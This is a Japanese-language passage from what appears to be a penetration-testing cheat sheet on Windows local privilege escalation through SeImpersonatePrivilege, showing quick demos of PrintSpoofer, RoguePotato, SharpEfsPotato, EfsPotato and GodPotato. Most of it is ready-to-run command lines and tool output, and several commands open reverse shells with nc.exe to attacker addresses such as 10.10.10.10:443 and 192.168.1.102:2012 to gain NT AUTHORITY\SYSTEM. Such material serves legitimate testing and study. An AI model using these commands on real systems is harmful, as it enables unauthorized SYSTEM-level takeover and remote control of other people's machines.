JuicyPotatoは Windows Server 2019およびWindows 10ビルド1809以降では動作しません。しかし、PrintSpoofer、RoguePotato、SharpEfsPotato、GodPotato、EfsPotato、DCOMPotato**は、**同じ特権を利用してNT AUTHORITY\SYSTEM**レベルのアクセスを取得するために使用できます。このブログ投稿では、JuicyPotatoがもはや動作しないWindows 10およびServer 2019ホストでの偽装特権を悪用するために使用できるPrintSpooferツールについて詳しく説明しています。
クイックデモ
PrintSpoofer
c:\PrintSpoofer.exe-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"--------------------------------------------------------------------------------[+] Found privilege: SeImpersonatePrivilege[+] Named pipe listening...[+] CreateProcessAsUser() OKNULL
RoguePotato
c:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-l9999# In some old versions you need to use the "-f" paramc:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-f9999
SharpEfsPotato
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotatoby@bugch3ckLocalprivilegeescalationfromSeImpersonatePrivilegeusingEfsRpc.BuiltfromSweetPotatoby@_EthicalChaos_andSharpSystemTriggers/SharpEfsTriggerby@cube0x0.[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:[x]RpcBindingSetAuthInfo failed with status 0x6d3[+] Server connected to our evil RPC pipe[+] Duplicated impersonation token ready for process creation[+] Intercepted and authenticated successfully, launching program[+] Process created, enjoy!C:\temp>typeC:\temp\w.logntauthority\system
EfsPotato
> EfsPotato.exe "whoami"Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
PartofGMH's fuck Tools, Code By zcgonvh.CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
[+] Current user: NT Service\MSSQLSERVER[+] Pipe: \pipe\lsarpc[!] binding ok (handle=aeee30)[+] Get Token: 888[!] process with pid: 3696 created.==============================[x] EfsRpcEncryptFileSrv failed: 1818nt authority\system
GodPotato
> GodPotato -cmd "cmd /c whoami"# You can achieve a reverse shell like this.> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
